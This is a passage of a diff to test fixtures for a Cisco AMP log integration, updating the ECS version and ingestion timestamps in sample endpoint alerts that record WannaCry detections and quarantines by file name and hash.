}, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2519,7 +2519,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:29.843609310Z",
+ "ingested": "2021-09-13T18:07:04.510384507Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
 "kind": "alert",
 "action": "Threat Quarantined",
@@ -2570,7 +2570,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -2590,7 +2590,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:29.843611171Z",
+ "ingested": "2021-09-13T18:07:04.510386359Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}",
 "kind": "alert",
 "action": "Threat Quarantined",
@@ -2641,7 +2641,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -2661,7 +2661,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:29.843613053Z",
+ "ingested": "2021-09-13T18:07:04.510388218Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}",
 "kind": "alert",
 "action": "Threat Quarantined",
@@ -2712,7 +2712,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -2732,7 +2732,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:29.843615119Z",
+ "ingested": "2021-09-13T18:07:04.510390180Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "kind": "alert",
 "action": "Threat Quarantined",
@@ -2783,7 +2783,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -2803,7 +2803,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:29.843617007Z",
+ "ingested": "2021-09-13T18:07:04.510392045Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -2858,7 +2858,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -2878,7 +2878,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:29.843618896Z",
+ "ingested": "2021-09-13T18:07:04.510393933Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -2933,7 +2933,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -2953,7 +2953,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:29.843620759Z",
+ "ingested": "2021-09-13T18:07:04.510395806Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -3008,7 +3008,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -3028,7 +3028,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:29.843622635Z",
+ "ingested": "2021-09-13T18:07:04.510397685Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -3096,7 +3096,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "user": [
@@ -3128,7 +3128,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:29.843624521Z",
+ "ingested": "2021-09-13T18:07:04.510399559Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":580000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\",\"sha1\":\"be5d6279874da315e3080b06083757aad9b32c23\",\"md5\":\"8495400f199ac77853c53b5a3f278f3e\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}",
 "kind": "alert",
 "action": "Threat Detected",
@@ -3198,7 +3198,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "user": [
@@ -3230,7 +3230,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:29.843639044Z",
+ "ingested": "2021-09-13T18:07:04.510401442Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":564000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\",\"sha1\":\"47a9ad4125b6bd7c55e4e7da251e23f089407b8f\",\"md5\":\"4fef5e34143e646dbf9907c4374276f5\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}",
 "kind":
"alert",
 "action": "Threat Detected",
@@ -3287,7 +3287,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -3307,7 +3307,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:29.843642931Z",
+ "ingested": "2021-09-13T18:07:04.510403305Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "kind": "alert",
 "action": "Threat Quarantined",
@@ -3358,7 +3358,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -3378,7 +3378,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:29.843644903Z",
+ "ingested": "2021-09-13T18:07:04.510405200Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
 "kind": "alert",
 "action": "Threat Quarantined",
@@ -3433,7 +3433,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "user": [
@@ -3465,7 +3465,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:29.843646784Z",
+ "ingested": "2021-09-13T18:07:04.510407053Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
 "kind": "alert",
 "action": "Threat Detected",
@@ -3522,7 +3522,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "user": [
@@ -3554,7 +3554,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:29.843648712Z",
+ "ingested": "2021-09-13T18:07:04.510408937Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":783000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
 "kind": "alert",
 "action": "Threat Detected",
@@ -3618,7 +3618,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "user": [
@@ -3650,7 +3650,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:29.843650655Z",
+ "ingested": "2021-09-13T18:07:04.510410809Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":727000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
 "kind": "alert",
 "action": "Threat Detected",
@@ -3718,7 +3718,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "user": [
@@ -3750,7 +3750,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:29.843652586Z",
+ "ingested": "2021-09-13T18:07:04.510412707Z",
